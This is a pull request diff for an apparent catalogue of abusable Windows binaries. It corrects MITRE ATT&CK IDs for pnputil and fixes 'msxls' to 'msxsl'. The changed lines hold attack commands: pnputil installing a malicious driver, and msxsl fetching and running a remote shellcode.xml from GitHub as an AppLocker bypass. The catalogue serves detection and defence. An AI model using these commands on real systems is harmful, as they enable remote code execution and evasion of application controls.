### PR TITLE
ATT&CK realignment, typo fixes

### DIFF
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Add malicious driver
     Category: Execute
     Privileges: Administrator
-    MitreID: T1547.008
+    MitreID: T1547
     OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\system32\pnputil.exe

--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@@ -6,10 +6,10 @@ Created: 2020-12-25
 Commands:
   - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
     Description: Used for installing drivers
-    Usecase: Aadd malicious driver
+    Usecase: Add malicious driver
     Category: Execute
     Privileges: Administrator
-    MitreID: T1547.006
+    MitreID: T1547.008
     OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\system32\pnputil.exe

--- a/yml/OtherMSBinaries/Msxsl.yml
+++ b/yml/OtherMSBinaries/Msxsl.yml
@@ -18,14 +18,14 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows
-  - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
+  - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
     Usecase: Local execution of remote script stored in XSL script stored as an XML file.
     Category: Execute
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows
-  - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
+  - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
     Usecase: Local execution of remote script stored in XSL script stored as an XML file.
     Category: AWL Bypass


### PR DESCRIPTION
Pnputil: T1547.006 is the wrong tid as it's only applicable to Linux and MacOS. The more appropriate tid would be T1547.008.
Msxsl: fixed some command spellings.